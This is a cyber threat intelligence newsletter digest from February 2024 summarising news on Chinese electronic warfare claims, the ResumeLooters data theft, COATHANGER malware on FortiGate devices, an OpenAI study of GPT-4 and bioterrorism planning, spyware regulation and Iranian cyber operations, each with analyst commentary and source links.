Daily Drop (715): CN: EW, ResumeLooter, CN: Starlink, OpenAI: Bioterrorism, COATHANGER malware, Pall Mall Process, SpaceDrone , Spyware Thrives Minus Bans, Iran Enhances CNO Capabilities
02-07-24
Wednesday, Feb 07 2024 // (IG): BB // ShadowNews // Coffee for Bob // Proxies
*Started adding the Proof Of Concepts (PoC) if available for mentioned CVE’s :
A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project. *
China's Alleged Breakthrough in Electronic Warfare: A Game Changer in Military Tech
Bottom Line Up Front (BLUF): Via State Sponsered Media (SCMP) Chinese researchers have reportedly achieved a significant breakthrough in electronic warfare (EW), claiming the ability to monitor and analyze the complete electromagnetic spectrum in real time. This advancement is said to potentially disrupt operations of satellites like Elon Musk’s Starlink, signifying a substantial benefit for their “GW” mega-constellation efforts - this could be laced with propaganda.
Analyst Comments: This development, if accurate, represents a pivotal shift in global military technology dynamics. The ability to monitor and disrupt communication satellites could alter the strategic balance, particularly in regions like the South China Sea. However, the veracity of these claims is crucial, as similar assertions in the past have sometimes outpaced actual capabilities. The focus on Starlink satellites specifically indicates China's concern over their potential use in military communications and reconnaissance. This scenario underscores the increasing importance of space and cyber domains in modern warfare, where advanced nations are actively seeking to gain the upper hand.
FROM THE MEDIA: Chinese scientists ( 1 2 ) claim to have made a significant breakthrough in electronic warfare technology, potentially allowing for the real-time monitoring and disruption of communication satellites, including Elon Musk’s Starlink. According to a South China Morning Post report, the technology enables the Chinese military to swiftly identify and suppress enemy signals while maintaining their communication networks. This advancement reportedly is onboard the Type 055 destroyer. The new technology is said to extend into the gigahertz zone, covering frequencies used by various communication platforms. The development of new signal-processing chips has been key to this enhanced capability. The implications of this breakthrough could be profound, especially concerning the security and effectiveness of satellite-based communication systems like Starlink, which have become integral in modern warfare and global communications. China's focus on such technologies highlights the strategic importance of dominating the electromagnetic spectrum in future conflicts.
READ THE STORY: IE // NBF // The EurAsian Times // WION // ET
Hackers Exploit Job Boards to Steal Millions of Resumes and Personal Data
Bottom Line Up Front (BLUF): The cybercriminal group known as ResumeLooters has been actively targeting employment agencies and retail companies in the Asia-Pacific region since early 2023. They have compromised 65 job search platforms and stolen over 2 million records, including resumes and personal data, using SQL injection and XSS attacks. The stolen data is sold on Telegram channels. This campaign highlights the persistent vulnerability of websites to SQL injection and XSS exploits.
Analyst Comments: ResumeLooters' activities underscore a continuing trend in cybercrime where threat actors exploit widely known vulnerabilities like SQL injection and XSS. Despite being long-identified security weaknesses, many websites remain inadequately protected, allowing cybercriminals to siphon vast amounts of sensitive data easily. The targeting of job search platforms is particularly concerning due to the personal nature of the data involved. This situation is a stark reminder for companies to prioritize robust cybersecurity practices and for individuals to be cautious about the information they share online. The geopolitical aspect, mainly focusing on the APAC region, indicates a strategic selection of targets, possibly due to perceived vulnerabilities in the cybersecurity infrastructure of these countries.
FROM THE MEDIA: The ResumeLooters group has been actively involved in cybercriminal activities since early 2023, focusing on job search platforms in the Asia-Pacific region. Group-IB, a cybersecurity firm, reported that this group compromised 65 websites between November and December 2023. The attackers used SQL injection techniques to access databases containing personal data like names, phone numbers, emails, dates of birth, and detailed employment histories. Over two million unique email addresses were found in the stolen dataset..
READ THE STORY: HackREAD // THN // Group-IB
China Perceives Starlink as a Threat to National Security and Bolsters Satellite Development
Bottom Line Up Front (BLUF): China has expressed serious national security concerns regarding SpaceX's Starlink satellites and their potential military applications under the Starshield program. The People's Liberation Army views the deployment of these satellites as a significant threat, capable of establishing a US advantage in space warfare.
Analyst Comments: China's reaction to SpaceX's Starlink program, particularly the new direct-to-cellular satellites, underscores Beijing's strategic anxiety about maintaining parity in space technology. The Chinese military's warnings about Starlink's potential military use, including "suicide missions" against other space assets, indicate a heightened perception of threat from US advancements in space. The focus on Starlink's ability to enhance communication capabilities, especially in remote areas, reflects the strategic value of maintaining communication superiority in modern warfare. China's concerns are amplified by Starlink's proven effectiveness in Ukraine, demonstrating the system's resilience and operational advantages. In response, China is advancing its own satellite capabilities, evidenced by the G60 Starlink project in Shanghai and the significant funding raised by Shanghai Yuanxin Satellite Technology Co., Ltd. This aggressive push in satellite technology is part of a broader strategy to counter US influence in space and secure its own interests, particularly regarding Taiwan.
FROM THE MEDIA: China has raised alarms over the military implications of SpaceX's Starlink satellites, especially within the context of the Starshield program. The concern stems from the perceived threat to national security, with fears that the deployment could afford the US an advantage in space warfare. Shanghai Yuanxin Satellite Technology Co., Ltd. has completed a substantial series A financing round of RMB 6.7 billion, with leading investment from the China Development Bank Manufacturing Transformation and Upgrading Fund. Continual strategic support is provided by founding shareholder Shanghai Lianhe Investment, with participation from various prominent investors including Guoke Capital, Guosheng Capital, SAIC Hengxu Capital, CCTV Media Fund, Guotai Junan, Zhongkechuangxing, and AsiaInfo Security.
READ THE STORY: Gamachar Central // Newsweek // China Money Network // WSJ
OpenAI's Experiment on AI’s bioterrorism potential should not be overlooked
Bottom Line Up Front (BLUF): A recent OpenAI study involving GPT-4 has sparked concerns over the potential misuse of AI in bioterrorism. Participants, including students and experts, were tasked with planning a biological terror attack using either the internet alone or in conjunction with GPT-4. Findings suggest that while GPT-4 provided a "mild uplift" in planning such attacks, it significantly enhanced the capabilities of experts in certain stages, raising alarm over the AI's potential misuse.
Analyst Comments: The OpenAI experiment marks a critical juncture in our understanding of AI's potential misuse, particularly in sensitive areas like bioterrorism. The experiment's design, involving a diverse group of participants and varying levels of access to GPT-4, provides a unique insight into the model's capabilities and limitations in aiding bioterrorism planning. The nuanced findings, indicating a slight but notable advantage for those using GPT-4, suggest that AI can incrementally enhance certain aspects of threat planning, especially for those with prior expertise. Historically, the dual-use nature of technology has always presented a balancing act between innovation and potential misuse. In the realm of AI, this balance becomes even more critical due to the technology's pervasive and rapidly evolving nature. The experiment’s outcome echoes previous technological advances where their benefits were accompanied by new risks.
FROM THE MEDIA: OpenAI's recent experiment, as covered by Anjana Ahuja, explores the intersection of AI and bioterrorism. Involving 100 participants with varying levels of expertise in biology, the study aimed to assess whether GPT-4 could aid in planning a biological terror attack. The participants, split into groups using either the internet or GPT-4, were tasked with planning an attack involving tasks like sourcing a biological agent and planning its release. The findings revealed that experts equipped with GPT-4 outperformed their counterparts who only used the internet, particularly in areas like procurement and scaling up of a bioweapon. However, the overall effect was considered mild and statistically insignificant. This nuanced result led to debates within the scientific and security communities about the actual level of threat posed by AI in this context. OpenAI's study aligns with broader research efforts, such as those by the Rand Corporation, which also found no significant enhancement of bioterror attack plans through AI compared to traditional internet use.
READ THE STORY: FT // The Washington Post // RAND // Anthropic
Chinese Hackers Breach Dutch Military Network Via FortiGate Flaw
Bottom Line Up Front (BLUF): Chinese state-backed hackers infiltrated a Dutch military network used for unclassified research and development by exploiting a critical security flaw in Fortinet FortiGate devices. The cyberattack, occurring in 2023, deployed the COATHANGER malware, allowing persistent remote access and evading detection mechanisms. This incident marks the first public attribution of a cyber espionage campaign to China by the Netherlands, amidst rising global concerns over Chinese cyber activities.
Analyst Comments: The breach of the Dutch military network signifies an escalation in cyber espionage, highlighting the growing sophistication of state-sponsored cyberattacks. The choice of target, a military R&D network, although unclassified, speaks to the strategic interest in military technologies and innovations. The deployment of COATHANGER, a highly stealthy malware, underscores the advanced capabilities of these threat actors. This incident fits into a broader pattern of Chinese cyber espionage, targeting global governmental and technological infrastructures. The timing of this revelation is crucial, as it coincides with increased international scrutiny of Chinese cyber activities and rising geopolitical tensions.
FROM THE MEDIA: The intrusion utilized a known vulnerability in FortiOS SSL-VPN, identified as CVE-2022-42475. The COATHANGER malware, distinct from another backdoor BOLDMOVE linked to China, is designed to be stealthy, persistent, and capable of surviving system reboots and firmware upgrades. This breach is part of a larger pattern of Chinese cyber espionage activities, as evidenced by past incidents and recent statements from Dutch authorities. Concurrently, the U.S. has taken action against Chinese threat actors in separate incidents, highlighting a coordinated international response to these threats. The Dutch Military Intelligence and Security Service (MIVD) and the Dutch National Cyber Security Centre (NCSC) have emphasized the need for heightened vigilance and improved cybersecurity measures in response to these sophisticated attacks.
READ THE STORY: The Register // Reuters // THN // PoC: CVE-2022-42475
The Pall Mall Process: Global Initiative on Commercial Spyware Regulation Faces Challenges
Bottom Line Up Front (BLUF): Israeli officials did not attend a key conference in London aimed at addressing the misuse of spyware, despite the country's significant role in the spyware export market. The conference, co-hosted by the UK and France, sought to launch the Pall Mall Process, an initiative for joint-action against the proliferation of commercial cyber intrusion tools. Notably, some countries implicated in spyware abuses did not sign the conference's pledge, highlighting the complexity of international consensus on this issue.
Analyst Comments: Israel's absence from the London conference is significant given its prominent position in the global spyware market and previous U.S. sanctions against Israeli companies for spyware misuse. The conference represents a critical step in international efforts to regulate the use of commercial spyware, which has been linked to human rights abuses globally. The varied participation and commitment levels among attending nations reflect the diplomatic and practical challenges in achieving a unified stance against spyware misuse. The Pall Mall Process appears to be a pivotal yet initial step towards more robust international cooperation and regulation in the cyber surveillance arena.
FROM THE MEDIA: The London conference, part of the Pall Mall Process, aims to increase transparency and accountability in the use of cyber intrusion tools. Over 35 states and international organizations, along with technology companies and civil society groups, attended, but key spyware market players like Israel were absent. The U.S. recently took concrete action against commercial spyware misuse, and the UK and France are spearheading this international effort. While 24 of the 35 attendees signed the pledge for greater action, notable countries with spyware abuse links, including Hungary, Mexico, Spain, and Thailand, refrained. The commitment includes engaging in dialogue and meeting again in France next year. This initiative underscores the growing global concern over spyware's role in human rights violations and national security threats.
READ THE STORY: The Record // GOV.UK
Spyware Industry Thrives Despite Global Crackdown Efforts
Bottom Line Up Front (BLUF): Despite governmental and technological efforts to regulate the spyware industry, the commercial spyware economy is experiencing substantial growth. Major players like NSO Group and Intellexa, alongside numerous smaller vendors, continue to develop and distribute surveillance tools. These tools are increasingly used for questionable purposes, including the targeting of human rights advocates, journalists, and political dissidents. Recent measures by the U.S. and an agreement led by the UK and France show concerted efforts to address this issue, yet the industry remains lucrative and largely unregulated.
Analyst Comments: The expansion of the spyware market, despite governmental actions and international agreements, highlights the challenges in curbing the misuse of such technologies. The commercial spyware industry, valued at $12 billion per year, continues to evolve, with a notable trend being the separation between spyware vendors and exploit developers. This industry's growth is concerning as it often results in human rights violations and undermines the trust and safety of the internet. The lack of shared data and transparency in this field hampers effective countermeasures, underscoring the need for a more coordinated and comprehensive approach to tackle this global cybersecurity threat.
FROM THE MEDIA: Google's Threat Analysis Group reports the discovery of 25 zero-days in 2023, with 20 exploited by spyware vendors. U.S. measures include visa restrictions on individuals involved in spyware misuse and adding certain companies to its Entity List. A recent international agreement led by the UK and France, participated in by 35 nations, aims to tackle the proliferation of spyware, but challenges remain in terms of implementation and enforcement. The spyware economy is not only a security concern but also a human rights issue, with numerous reports of spyware being used to detain and harm dissidents and journalists. The industry's resilience and adaptability call for more effective and collaborative global strategies to regulate and monitor the use of commercial spyware.
READ THE STORY: The Register // TAG
Sierra Vista to Host BlackStar Orbital's SpaceDrone Manufacturing Facility in 2026
Bottom Line Up Front (BLUF): BlackStar Orbital Technologies Corporation plans to establish a new manufacturing facility for its innovative SpaceDrone satellites at the Sierra Vista Municipal Airport by mid-2026. This development aligns with the company's focus on building reusable micro shuttle space drones, offering a sustainable alternative to single-use satellites. The project, representing a $7.1 million investment, is expected to generate significant economic impact and create 50 new jobs in the area.
Analyst Comments: The decision by BlackStar Orbital to set up their SpaceDrone manufacturing facility in Sierra Vista, Arizona, is a strategic move that leverages the region's existing aerospace expertise and infrastructure. This initiative marks a significant advancement in satellite technology, emphasizing sustainability in space operations. The SpaceDrone, resembling a miniature space shuttle, represents a shift away from the traditional single-use satellite model, potentially revolutionizing the space industry. The economic implications for Sierra Vista are substantial, with the potential to attract further aerospace and technology investments to the region. The project also highlights the growing trend of private companies leading innovations in space technology, further expanding the commercial space industry.
FROM THE MEDIA: The SpaceDrone, developed by BlackStar Orbital, is a reusable satellite about 2 meters long and 1.5 meters wide, capable of operating and landing like a space plane. The Sierra Vista facility will focus on building and testing the first generation of these SpaceDrones. The location was chosen due to its proximity to Fort Huachuca and the availability of relevant human capital. The city of Sierra Vista plans to apply for a Spaceport License from the Federal Aviation Administration, a critical step in advancing the project. The facility is expected to bring over $100 million in economic impact and create 50 new jobs, spanning various technical and operational roles. The development of this facility and the SpaceDrone technology aligns with the broader trend of increased private sector involvement and innovation in space exploration and sustainability.
READ THE STORY: AZPM
Iran Enhances Cyber Operations, Potentially Targeting US Infrastructure and 2024 Elections
Bottom Line Up Front (BLUF): Microsoft researchers have observed a significant refinement and increased coordination in Iranian cyber operations, raising concerns about potential threats to U.S. critical infrastructure and the upcoming 2024 elections. Iranian-linked groups have expanded their targets to include allies of Israel and are employing more sophisticated tactics, including the use of artificial intelligence in influence operations.
Analyst Comments: The evolution of Iranian cyber capabilities signifies a growing sophistication in state-sponsored cyber activities. The shift from opportunistic attacks to more focused and coordinated operations illustrates an increasing threat level, particularly with the involvement of various Iranian government entities and contractors. The diversification of targets and techniques, including AI-driven influence campaigns, indicates a strategic approach to cyber operations. This development is a critical concern for U.S. cybersecurity, given the potential implications for critical infrastructure security and the integrity of the electoral process. The situation underscores the need for robust cyber defenses and international cooperation to counter these emerging threats effectively.
FROM THE MEDIA: Following the conflict between Israel and Hamas, Iranian cyber operations have undergone three distinct phases, with an initial reactive phase giving way to more destructive and coordinated attacks. This escalation includes increased targeting of nations perceived as Israeli allies, with recent attacks on infrastructure in the United States. The U.S. government has attributed some of these attacks to the Islamic Revolutionary Guard Corps Cyber-Electronic Command and has sanctioned Iranian officials. The use of AI in influence operations, such as disrupting news channels, represents a new tactic in the Iranian cyber arsenal. Microsoft's analysis suggests a more complex threat environment ahead of the 2024 U.S. elections, with an increase in collaborative efforts among various Iranian and Iran-affiliated groups.
READ THE STORY: Cyberscoop // Insikt
Items of interest
"Meme-lord" Litquidity: From Wall Street Satire to Entrepreneurial Success
Bottom Line Up Front (BLUF): Hank Medina, known by his pen name Litquidity, has revealed his true identity, transitioning from a satirical online persona to a successful entrepreneur. With a following of 800,000 on Instagram, Litquidity gained popularity for his humorous memes poking fun at Wall Street culture. Despite being the opposite of the loud and brash stereotype, Medina's alter ego became a cult-like figure in the finance industry.
Analyst Comments: Medina's journey from a junior investment banker to the mastermind behind Litquidity demonstrates the power of social media in shaping entrepreneurial ventures. Despite his unassuming nature, Litquidity's satire resonated with young finance professionals, leading to a significant online following. Medina's ability to leverage his online persona into a profitable brand showcases his business acumen and adaptability in the digital age.
FROM THE MEDIA: Hank Medina, also known as Litquidity, has stepped out from behind his satirical online persona to reveal his true identity. Medina's journey from a quiet observer in the finance industry to a social media sensation with 800,000 followers on Instagram highlights the transformative power of online humor. Despite initial anonymity, Litquidity's popularity grew, leading to a profitable portfolio of businesses and investments. Medina's success serves as a testament to the evolving landscape of entrepreneurship and the influence of digital media in shaping modern brands.
READ THE STORY: FT
Why Do Memes Matter? (Video)
FROM THE MEDIA: Memes are the language of the internet. At some point in the last decade, they became the secret ingredient for advertising, political messaging, and disinformation all across the world. Glad You Asked host Christophe Haubursin wanted to know why that happened — and what it means for the internet today.
The World War II meme that circled the world (Video)
FROM THE MEDIA: We know about the epic drama of World War II, but what about the jokes? The above video tells the story (as best as we can). The iconic piece of graffiti that was known, in America, as "Kilroy Was Here" traveled the world in a fashion remarkably similar to a modern meme.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.